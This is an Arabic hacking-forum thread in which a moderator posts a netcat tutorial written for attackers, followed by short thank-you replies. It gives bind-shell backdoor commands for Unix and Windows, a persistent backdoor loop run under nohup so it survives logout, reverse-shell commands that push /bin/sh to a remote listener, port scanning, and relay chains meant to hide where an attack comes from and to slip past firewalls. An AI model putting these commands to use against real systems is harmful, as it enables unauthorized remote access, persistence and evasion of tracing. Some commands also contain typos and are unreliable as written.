تذكرنــي
التسجيل التعليمات التقويم البحث مشاركات اليوم اجعل كافة الأقسام مقروءة



::.قسم إختراق الأجهزه والبريد الاكتروني .:: هذا القسم يختص باختراق جميع أنواع البريد وجميع الطرق الحصريه لإختراق الأجهزه

اضافة رد

 
أدوات الموضوع انواع عرض الموضوع

رقم المشاركة : ( 1 )
الصورة الرمزية zero_cool
zero_cool
مشرف
zero_cool متواجد حالياً
 
رقم العضوية : 17240
تاريخ التسجيل : Jan 2011
مكان الإقامة :
عدد المشاركات : 648
عدد النقاط : 10
قوة التقييم :
افتراضي Netcat واستخداماتها

كُتب : [ 11-12-2017 - 03:13 AM ]


السلام عليكم ورحمة الله وبركاته
ان شاء الله تكونوا في تمام الصحة والعافية


النتكات هي واحدة من الأدوات الأكثر فائدة لل hacking وال cracking المتاحة اليوم.
فهي تسمح لك بنقل البيانات بسهولة عبر الشبكة, تعمل إلى حد كبير مثل الأمر "cat" في ال unix ،
حيث يمكن إرسال البيانات عبر مختلف منافذ TCP أو UDP بدلا من خلال البرامج أو الملفات.
أصدر فريق التطوير nmap نسخة نتكات تدعى ncat، والتي لديها بعض الميزات المثيرة للاهتمام.
والتي تدعم التشفير SSL لكل من ال listeners وال clients.
كما أنها تسمح للعديد من ال clients الإتصال ب listener واحد في الوقت ذاته.
ncat يمكن أيضا مساعدة المستخدم التواصل بين نظامين وراء أجهزة NAT.
يوجد خاصية أخرى للنتكات أنها تسمح لمستخدمين بالدردشة.
هنا، يتنصت ال listener على الاتصالات من عدة عملاء أو clients.
يتم إرسال أية بيانات مرسلة من أحد العملاء إلى جميع العملاء الآخرين،
ولكن مع رسالة مرفقة مسبقا تشير إلى رقم مستخدم فريد لكل عميل.
تقوم Dnscat بتنفيذ ميزات netcat باستخدام استعلامات DNS والاستجابات لنقل البيانات عبر الشبكة.
سنركز في هذا الدرس على النتكات الأصلية ، لأنه لا يزال الأكثر استخداما من قبل مهاجمين الكمبيوتر،
نظرا لأنها مدمجة في العديد من توزيعات لينكس .
افتراضيا نتكات في وضع client mode إذ يجب اخبارها أي نظام وأي منفذ ستتصل به.
يمكنك ربط مخرجات النتكات ببرنامج أو ربط البيانات الآتية للنتكات داخل برنامج.
يمكنك أيضا إعادة توجيه مخرجات النتكات إلى ملف. انها حقا تعمل مثل "cat" عبر الشبكة.
باستخدام الخيار -l (ل "التنصت")، يتم وضع النتكات في وضع التنصت.
تخبرها أي منفذ ستتنصت عليه (TCP أو UDP).
تتلقى نتكات الحزم من الشبكة ثم ترسل محتوياتها إلى الشاشة.
بدلا من ذلك، يمكن توجيه البيانات المستلمة من الشبكة إلى ملف أو ايصالها بأي مدخلات لأي برنامج.
هذه هي أهم خيارات سطر الأوامر ل نتكات.
على الرغم من أن هناك العديد من الأوامر الأخرى ، ومعرفة هذه الخيارات يمكنك استخدام نتكات في حوالي 95ظھ من الظروف المتاحة.
الفورمات هي كالتالي:
[nc [options] [target] [remote port
النظام المستهدف (target) هو ببساطة عنوان ال IP أو اسم الدومين.
وهو مطلوب في وضع العميل (client mode)، بطبيعة الحال، وهو اختياري في وضع التنصت (listen mode).
-l: listen mode (وضع العميل بصفة افتراضية)
-L: التنصت أصعب (معتمدة فقط على إصدار نتكات في الويندوز). هذا الخيار يجعل من نتكات متنصت مستمر، أي تجعل من نتكات تتنصت مرة أخرى بعد فصل العميل.
u : UDP-

-p:
في الإصدارات الأكثر تقليدية من النتكات، يشير هذا الخيار إلى المنفذ المحلي أو local port .
في server mode هذا الخيار يمثل المنفذ المتنصت عليه.
وفي وضع العميل (client mode) هذا الخيار يمثل ال source port .
في إصدارات أخرى من نتكات (وخاصة تلك المستمدة من GNU-Netcat)،
يشير p إلى "source port" فقط.
الفرق هنا في كثير من الأحيان في كيفية إنشاء المنصتين (listeners).
في النتكات التقليدية، لتنصت على المنفذ 8080، يمكنك تشغيل "nc -l -p 8080" للإشارة إلى المنفذ المحلي للمنصت،
في نتكات gnu، يمكنك تشغيل "nc -l 8080"، تاركا p لأنك عادة لا تهتم بال source port.
-e: البرنامج الذي سيتم تنفيذه بعد الاتصال، خيارا مفيدا لخلق الباكدورز
-z: Zero-I/O mode (مفيدة في السكان )
-wN: الإنتظار لمدة كم ثانية ومفيدة أيضا في السكان, هذا الخيار يشكل خلط عند بعض الناس. لذلك دعونا ننظر فيه بمزيد من التفصيل.
في مضمونها، عميل النتكات أو المنصت مع هذا الخيار ينتظر كم ثانية لعمل الاتصال.
إذا لم يحدث الاتصال في ذلك الوقت، يتوقف النتكات عن العمل. في حالة حدوث اتصال.
نتكات يرسل أو يسترد البيانات. عندما لا يتم إرسال أية بيانات في كم ثانية، يتوقف نتكات عن العمل.

تفريغ المخرجات إلى ملف :<
تفريغ المدخلات من ملف:>
ايصال المخرجات من البرنامج الأول إلى البرنامج الثاني :|
يمكن استخدام نتكات في جميع أنواع الهجمات التي تركز على الشبكة.
سننظر في كيفية تطبيق الأداة على الأنواع التالية من الهجمات:
فحص المنافذ ونقاط الضعف الأمنية
عمل اتصالات للمنافذ المفتوحة
باكدورز
Relays
هذه ليست سوى بعض الطرق التي يمكن استخدام النتكات فيها. هناك عدد لانهائي، محدودة فقط من قبل خيال المستخدم.

نقل البيانات
واحدة من أبسط الاستخدامات ل نتكات هو نقل البيانات بين جهازين. لإرسال الملفات بين الأجهزة، لديك الخيارات التالية:
) لنقل الملف من ال listener إلى ال client :
listener: nc -i -p 1234 < filename
client: nc[listeneriP] 1234 > filename

2) لدفع ملف من ال client إلى ال listener:
listener: nc -l -p 1234 > filename
client: nc[listeneIP] 1234 < filerame

يمكنك حتى استخدام متصفح كعميل للخيار 1. أيضا، هذا النقل للملفات بالنتكات يعمل مع TCP أو UDP.

فحص المنافذ ونقاط الضعف الأمنية
نتكات تدعم معيار "ال vanilla" في فحص المنافذ، واستكمال المصافحة الثلاثية ل TCP وفقط اطلاق البيانات في منفذ UDP.
على الرغم من أنها ليست كامل المواصفات أو التخفي في القيام في فحص المنافذ كال nmap، نتكات لا تزال أداة أساسية في فحص المنافذ.
[nc -v -w3 -z [targetIP] [startport] [endport
-v : تخبرنا متى يتم الإتصال وهذا يعني أن المنفذ مفتوح.
-w3 : يعني الانتظار لا يزيد عن 3 ثوان على كل منفذ.
-z : من أجل إرسال الحد الأدنى من البيانات
فكر في كيفية تعديل هذا لإجراء فحص للمنفذ من source port 80
يمكنك إضافة "p 80-" إلى الأمر. الخيار -p تعني local port عند العميل يعني في هذا الفحص للمنافذ تعني ال source port.
وبعيدا عن فحص المنافذ ، يمكن تحويل نيتكات إلى فاحص لنقاط الضعف الأمنية بسيطة باستخدام بعض السكريبتات
التي تخلق بعض البيانات لإرسالها إلى الهدف، وإرسال تلك البيانات باستخدام نتكات،
ومن ثم تحليل الاستجابة لنقاط الضعف الأمنية .
هناك عدد محدود من السكريبتات المدرجة مع نتكات للعثور على نقاط الضعف.
هذه السكربتات تبحث عن أشياء مثل:
كلمات السر الضعيفة ( root root , sh sh)
علاقات ثقة ضعيفة
Buggy FTP
Remote procedure calls
عمل اتصالات للمنافذ المفتوحة
هذا واحد من أكثر الأشياء التي من اجلها أستخدم نتكات. عندما يكتشف المهاجم منفذا مفتوحا على النظام (من خلال فحص المنافذ)،
فإن الخطوة التالية هي الاتصال إلى هذا المنفذ ومحاولة فهم مايمكن تنصته هناك.
يمكن ببساطة إستعمال telnet إلى المنفذ، ولكن telnet عادة معلقة وليست وسيلة نظيفة للاتصال.
نتكات، في وضع العميل، تتصل بالمنفذ بطريقة نظيفة، والسماح للمهاجم للدخول في جميع أنواع البيانات.
الأهم من ذلك، نتكات تسمح للمهاجم ببساطة فصل الاتصال.عندما يقوم المستخدم ببساطة ضغط "ctrl + C،" نتكات يقطع الاتصال.
عملاء telnet أيضا يضعون رسائل خطأ مختلفة على الشاشة، والتي لم يتم تلقيها من الشبكة.
يمكن أن يؤدي ذلك إلى اتلاف ملف البيانات إذا تم التقاطه من telnet. وأخيرا، telnet لا تدعم udp ، ولكن نتكات تدعم.

باكدورز
سجل الدخول (أو على أي باكدور) على أي منفذ TCP أو UDP
UNIX: nc -l -p [port] -e /bin/sh
Windows: nc -l -p [port] -e cmd.exe

استخدام نتكات في وضع العميل للاتصال بالباكدور المنصت:
[nc [target] [port

يتم تسجيل دخولك كمستخدم يشغل نتكات.
Persistent Backdoor Listeners
يمكن لمهاجم جعل نتكات تتنصت بصفة مستمرة على أونيكس و لينوكس باستخدام حلقة وذلك بتطبيق الأمر التالي:
while [ 1 ]; do echo “Started”; nc -l -p [port] -e /bin/sh; done
عند تنفيذ هذا الأمر يطبع "started" على الترمينال، تتنصت على منفذ TCP معين،
ثم استدعاء الأمر (/bin/sh) عندما يتصل شخص ما.
ماان تنتهي الكومند شيل يتم طبع "started" مرة أخرى ، ثم يستمع من جديد على المنفذ للاتصال.
وبهذه الطريقة، أنشأ المهاجم listener مستمر باستخدام إصدار أونيكس / لينوكس من نتكات، مع بعض البرمجة .
ومع ذلك، لا تزال هناك مشكلة صغيرة. إذا قام المهاجم بتسجيل الخروج من النظام،
فإن listener النتكات يختفي لأن المستخدم الذي استند إليه قد اختفى.
للقضاء على المشكلة وجعل ال listener مستمر تماما و تسمح للمهاجم بتسجيل الخروج،
المهاجم يمكن أن يكتب السنتاكس السابق في ملف يسمى listener.sh، على سبيل المثال.
ثم يقوم المهاجم بتغيير صلاحيات الملف باستعمال هذا الأمر:
chmod 555 listener.sh
ثم جعله يعمل باكراوند باستخدام هذا الأمر:
& nohup ./listener.sh
Reverse Shells
[listener: nc -l -p [port
client: nc[listenerlP] [port] -e /bin/sh
بالإضافة إلى ذلك، يمكنك استخدام نتكات لدفع جلسة شل من العميل إلى السيرفر.
وتسمى هذه التقنية أحيانا "reverse shell " أو حتى "shoveling shell".
خارج جدار الحماية، يمكنك تنفيذ السيرفر، في انتظار العميل. يتصل العميل بالسيرفر مع جلسة صادرة إلى منفذ محدد مسبقا (23، 25، 80، أي منفذ؟)
يمكن لجدار الحماية أن يخلط عند هذا الإتصال. ومع ذلك في الواقع المهاجم سيكون له كومند شيل على النظام الهدف.
جدران الحماية الجيدة تستطيع كشف أن بروتوكول طبقة التطبيقات لا يتم استخدامه وينبغي بذلك إيقاف الترافيك.

Relays
يمكن جعل النتكات تنقل المعلومات من آلة إلى آلة لآلة.
إعادة توجيه البيانات من خلال المنافذ التي يسمح بها جدار الحماية.
أو استخدام ال relays لجعل الأمر أصعب لتتبع نقطة المنشأ الحقيقية للهجوم.
نتكات يمكن استخدامها لترتد هجوم عبر مجموعة من الآلات التي يملكها مهاجم.
لنفترض أن المهاجم يتحكم في آلات " A" و " B" (يمكن أن يكون خادم الويب وخادم البريد).
مكن للمهاجم إنشاء نتكات على كل من الآلات لنقل المعلومات عبر الجهاز،
وتجاهل نقطة المنشأ الحقيقية للهجوم. لإنشاء نتكات أحادية الاتجاه،
لا يلزم سوى سلسلة أوامر واحدة فقط:
nc -l -p incoming_port | nc target_server outgoing_port
على سبيل المثال:
no -l -p 2222 | nc server 43567
هذا يعيد توجيه كل ما يأتي على هذا الجهاز على المنفذ tcp 2222 إلى نضام server على المنفذ tcp 43567.
طرق عمل netcat relays

وهذا ماسنراه في الجزء الثاني باذن الله مع تطبيق عملي لكل ما ذكر سابقا.

في أمان الله

توقيع : zero_cool

.:: فريق قراصنة غزة ::.

رد مع إقتباس
بياناتي
 رقم المشاركة : ( 2 )
ElSyad
المشرف العام
رقم العضوية : 33419
تاريخ التسجيل : Nov 2012
مكان الإقامة :
عدد المشاركات : 252
عدد النقاط : 10

ElSyad غير متواجد حالياً

افتراضي

كُتب : [ 11-12-2017 - 05:08 PM ]


تسلم ايديك يا برنس


توقيع : ElSyad

The Best Revenge Ever Is Success
مدونتي
http://www.arab-blog.net/
الصياد /.

رد مع إقتباس
بياناتي
 رقم المشاركة : ( 3 )
joker215

رقم العضوية : 37707
تاريخ التسجيل : Mar 2013
مكان الإقامة :
عدد المشاركات : 19
عدد النقاط : 10

joker215 متواجد حالياً

JoKer-FaLLaGa

افتراضي

كُتب : [ يوم أمس - 11:48 PM ]


اداة مهمة شكرا على الشرح


توقيع : joker215



رد مع إقتباس

اضافة رد

العلامات المرجعية

الكلمات الدلالية (Tags)
netcat, واستخداماتها


يتصفح الموضوع حالياً : 5 (0 قرصان و 5 ضيف)
 
أدوات الموضوع
انواع عرض الموضوع

ضوابط المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا يمكنك اضافة مرفقات
لا يمكنك تعديل مشاركاتك

BB code متاحة
كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
برنامج تعليمي netcat part 3 ahmad lotfi .:: قسم الكتب الالكترونية E-BOOK ::. 1 08-04-2014 10:43 AM
برنامج تعليمي netcat part 2 ahmad lotfi .:: قسم الكتب الالكترونية E-BOOK ::. 3 08-04-2014 10:42 AM
برنامج تعليمي netcat part 4 ahmad lotfi .:: قسم الكتب الالكترونية E-BOOK ::. 0 03-27-2014 07:01 PM
استخدامات الاداة Netcat متعددة . . ادخل شوفها mr.le0n ::. قسم إختراق المواقع والمنتديات .:: 29 05-01-2013 07:55 PM
شرح أداة Netcat D3vil H4ck3r ::. قسم إختراق المواقع والمنتديات .:: 5 11-20-2010 02:25 PM


جميع الأوقات بتوقيت GMT +2. الساعة الآن 10:11 AM.



أقسام المنتدى

الأقسام الإسلامية @ .:: القسم الإسلامي العام ::. @ .:: قسم القرآن الكريم وتجويده ::. @ .:: قسم الاناشيد والشريط الاسلامي ::. @ .:: سيرة و قصص الأنبياء و الصحابة ::. @ الأقسام العامة @ .:: قسم الساحة العامة ::. @ .:: قسم فـلـسـطــيــن ::. @ .:: قسم للتوعية الأمنية ::. @ .:: عالم البرامج الكاملة والنادرة ::. @ .:: قسم أخبار التقنية المعلوماتية والتكنولوجية ::. @ .:: قسم عالم المحادثة ::. @ .:: قسم الأمن و الحماية | Security ::. @ ::. قسم حماية الاجهزة والايميلات .:: @ ::. قسم حمايه المواقع والسيرفرات.:: @ ::. قسم إختراق المواقع والأجهزة والبريد الإلكتروني | Hacker .:: @ ::. قسم إختراق المواقع والمنتديات .:: @ ::.قسم إختراق الأجهزه والبريد الاكتروني .:: @ .:: قسم الثغرات ::. @ .:: الركن الترفيهي ::. @ .:: قسم الصور ::. @ .:: ركن الأدارية ::. @ .:: قسم الشكاوي ولأقتراحات ::. @ خاص بشروحات الفيديو @ الأدوات , hack tools @ .:: قسم مساعدة الاعضاء ::. @ :: المواضيع المحذوفة :: @ قسم الانجازات @ .:: جديد قراصنة غزة ::. @ :: قسم استراحة الأعضاء :: @ :: YouTube :: @ .:: القسم التقني ::. @ :: عالمـ الكومبيوتر :: @ :: قسم الجوالات والاتصالات :: @ :: قسم التصميم والغرافيك :: @ خاص للادارة والمشرفين @ :: قسم خاص بالمبتدئين :: @ :: خاص بثغرات المتصفح :: @ :: خاص بشروحات الفيديو :: @ .:: الدورات المقدمة من المشرفين ::. @ :: مشآكل الكومبيوتر وحلولها :: @ .:: للنقاش الجاد ::. @ الملتقى الأدبي .. @ :: طلبات الإشراف :: @ :: كتب الحماية والاختراق security&hacking :: @ البحوث العلمية @ تعليم اللغات الأجنبية @ .:: كتب الكترونية منوعة ::. @ .:: القسم الدعوي ::. @ قسم الكتب الاسلامية @ قسم المواضيع المميزة @ :: قسم خاص بالتشفير :: @ قسم اخبار العالم وقضايا الأمة الإسلامية @ Local root @ دورة إحترآف إلـ Spam Email @ فلسطين , palestine @ .:: مدن وقرى فلسطين ::. @ .:: تاريخ فلسطين ::. @ .:: شهداء فلسطين ::. @ .:: مدينة القدس ::. @ .:: مدينة غزة ::. @ .:: لعروض التصاميم ::. @ .:: لدروس التصاميم ::. @ :: قسم اصدارات وانجازات الفريق :: @ .:: قسم قضية فلسطين ::. @ .:: قسم عروض الاستايلات :.. @ قسم اخبار وقضايا اليهود @ .:: قسم الهاكات وتطوير المنتديات ::. @ ::. قسم المسابقات والنشاطات .:: @ لوحة تحكم سي بانل , cPanel Management @ حماية قواعد البيانات mysql , sql @ لوحة تحكم , Plesk Management @ ادارة سيرفرات Linux @ .:: SQL-injection , حقن قواعد بيانات ::. @ :: قسم خاص بالمبتدئين :: @ .:: قسم الكتب الالكترونية E-BOOK ::. @ .:: قسم تفسير القران الكريم ::. @ قسم الدفاع عن النبي محمد والصحابة وآل البيت @ .:: قسم لغات البرمجة ::. @ قسم برمجة لغة Php , Html @ قسم برمجة لغة mysql , sql @ .:: القسم الرمضانى ::. @ جديد الشيخ نبيل العوضى @ حجب الخدمة , ddos attack @ قسم الاختراق المتقدم @ .:: حماية الاجهزة وطرق كشف التلغيم ::. @ .:: قسم حماية الايميلات :. @ قسم اختراق سيرفرات windows @ .:: دورة قراصنة غزة للتصميم ::. @ .::: أسرى فلسطين ::. @ مدرسة قراصنة غزة لحقن قواعد البيانات @ ::. قسم مشروع الباك تراك backtrack , الميتاسبلويت MetaSploit .:: @ فريق :: Gaza HaCker Injector Team-GHI :: @ دورة أساتذة حقن قواعد البيانات المتقدمة لعام 2017 / 2018 @ GH-InjeCtor-Team @ .:: قسم الصلاة ثم الصلاة ::. @ وَحَرِّضِ الْمُؤْمِنِينَ @ قسم انظمة لينكس Linux, Unix @ قسم الالعاب الالكترونية @ قسم اختراق الشبكات السلكية واللاسلكية @ قسم الميكاترونكس (بناء الروبوتات) @ قسم الدورات المدفوعة @ قسم اختراق الاجهزة اللوحية @ دورات حقن قواعد البيانات للمٌبتدئين من الألف إلى الإحتراف @